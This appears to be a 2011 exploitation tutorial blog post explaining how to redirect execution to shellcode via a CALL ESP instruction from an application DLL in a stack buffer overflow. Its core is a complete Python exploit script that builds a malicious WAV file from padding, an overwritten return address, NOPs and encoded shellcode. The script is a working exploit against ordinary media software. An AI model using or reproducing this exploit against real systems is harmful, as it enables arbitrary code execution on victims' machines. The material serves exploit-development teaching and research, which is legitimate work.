Julien Ahrens === @MrTuxracer

Vulnerability Intel | ROP Gadget Hunter | Privacy Enthusiast | Full-time BugBounty hunter | @Hacker0x01 MVH | @SynackRedTeam member | on a world-trip

Buffer Overflow Exploitation: Jump to shellcode via CALL ESP

10 Dec 2011 » Tutorials

In my first tutorial I’ve taken a JMP ESP from some system .dll called WMVCore.dll. Since this isn’t a reliable jump, because the WMVCore.dll might differ from OS version to OS version, it would be more reliable to take one from a loaded application DLL. Those will never change, because they always come with the installer of the application.

Beside the JMP ESP, we’ve got also the possibility to jump to our shellcode using a CALL ESP (opcode: FF D4), so let’s have a look at the loaded application DLLs and take a nice, useable address (we’ve to take care about the little-endian notation and the null-problem here !).

The MACDll.dll is loaded between C80000 and CD0000 and there’s also a CALL ESP in this range @ 0x00CA5DD3. Now we can modify the Python script to use the CALL from the application DLL instead of the Windows DLL:

from struct import pack

file="fuzzing.wav"
junk="\x41"*4112
eip=pack('<I',0x00CA5DD3) #call esp from MACdll.dll (loaded @C80000)
nops = "\x90" * 3

shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e"
"\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78"
"\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5"
"\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05"
"\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f"
"\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33"
"\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9"
"\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f"
"\xe8\x7b\xca")

writeFile = open (file, "w")
writeFile.write(junk+eip+nops+shellcode)
writeFile.close()

And et voila, we’ve got a more reliable exploit now!